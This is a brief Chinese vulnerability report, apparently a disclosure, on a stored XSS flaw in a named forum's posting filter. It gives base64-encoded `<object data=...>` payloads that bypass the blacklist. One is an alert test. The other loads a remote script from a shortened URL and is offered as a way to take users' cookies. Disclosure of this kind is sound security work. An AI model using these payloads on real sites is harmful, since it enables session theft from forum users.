### 简要描述:
存储型xss
### 详细说明:
发帖时没过滤好黑名单 导致可绕过
进行xss
url:http://bbs.teamcen.com/thread-3-10.html
[<img src="https://images.seebug.org/upload/201403/170005355e6f7ab5d7fc713168e9e353793abf73.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/170005355e6f7ab5d7fc713168e9e353793abf73.png)
使用的payload:`<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>`
当然你想要获取cookies也行
payload换成 `<object data=data:text/html;base64,PHNjcmlwdC9zcmM9aHR0cDovL3QuY24velliWmROZD4=></object>`
只要是base64解码就行
### 漏洞证明:
过
暂无评论